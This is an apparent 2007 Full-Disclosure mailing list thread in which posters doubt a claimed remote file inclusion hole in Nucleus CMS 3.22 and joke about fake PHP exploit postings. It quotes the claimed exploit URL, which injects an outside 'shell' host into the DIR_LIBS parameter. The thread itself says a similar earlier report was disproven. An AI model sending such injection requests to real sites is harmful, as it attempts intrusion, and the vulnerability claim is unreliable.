Date: Tue, 8 May 2007 08:18:44 -0500
From: evilrabbi <evilrabbi@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: nucleus 3.22 >> RFI

I like the idea they are all terrorists passing secret messages in fake
exploits.
/me waits on the Tom Clancy movie

On 5/7/07, Ron Superior <rsuperior@...il.com> wrote:
>
> Hi folks,
>
>   Some months back I seem to remember people hypothesizing as to the
> real purpose behind some of these particularly lame fake PHP exploits.
> You know the ones I mean; they're mostly remote file includes, they
> often are decorated with some simple ASCII art, and the "thanks" and
> "greetz" sections are always loaded with names that suggest Turkish or
> other Middle Eastern origin.
>
>   The two most interesting suggestions that I recall were:
>
>   1) Somebody wanted to pump up the lists with PHP exploits so they
> could claim later that some large number X of PHP vulnerabilities had
> been posted to FD since some date.
>
>   2) Covert communication, or that the "exploits" were really secret
> messages between t3rr0ri$ts or something.
>
>   I'm sure there exists a motive beyond just spamming us to be
> annoying.  Anyone have any new ideas, or good arguments for either of
> the above two ideas?
>
>     Ron
>
> Guasconi Vincent wrote:
> > On 5/6/07, security curmudgeon <jericho@...rition.org> wrote:
> >> : VENDOR :http://nucleuscms.org/
> >> : BY : s3rv3r_hack3r (hackerz.ir admin)
> >> : bug:
> >> : nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS . 'PLUGINADMIN.php');
> >> : Exploit:
> >> : http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
> >>
> >> I haven't examined the source code to this, but on June 16, 2006,
> >> gamr-14@...mail.com disclosed RFI vulnerabilities [1] in four Nucleus
> >> scripts, all with the DIR_LIBS variable as the injection point. This was
> >> subsequently proven to be a false report as the variable was previously
> >> set and could not be manipulated by an attacker.
> >>
> >> Have you actually tested this, or is this based on a quick grep of the
> >> source code?
> >
> > They're like bots now.
> > They didn't hear you, and you can't stop them.
> >
> > Try a spam rule.
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
-- h0 h0 h0 --
www.nopsled.net
